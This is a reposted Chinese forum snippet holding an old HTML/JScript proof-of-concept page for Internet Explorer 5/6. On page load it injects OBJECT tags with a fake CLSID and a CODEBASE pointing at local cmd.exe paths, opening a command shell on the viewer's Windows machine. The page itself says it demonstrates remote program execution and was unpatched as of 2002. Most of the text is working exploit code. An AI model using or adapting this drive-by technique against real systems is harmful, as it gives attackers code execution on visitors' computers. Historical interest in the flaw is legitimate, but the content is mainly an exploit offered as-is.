忘了是哪个网站上抄下来的了，javascript运行客户端exe程序

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:#222222;background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
    @#c:/windows/system32/cmd.exe@#,
    @#c:/winnt/system32/cmd.exe@#,
    @#c:/cmd.exe@#
);

function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html=@#@#;
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME=@#X@# CLASSID=@#CLSID:11111111-1111-1111-1111-111111111111@# CODEBASE=@#"+programName[n]+"@# %1=@#r@#></OBJECT>";
    oPopBody.innerHTML=html;
    oPopup.show(290, 190, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
<H1>Hmm, let@#s start a command shell...</H1>
<p>
This page doesn@#t do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
</BODY>
</HTML>

原文转自：http://www.ltesting.net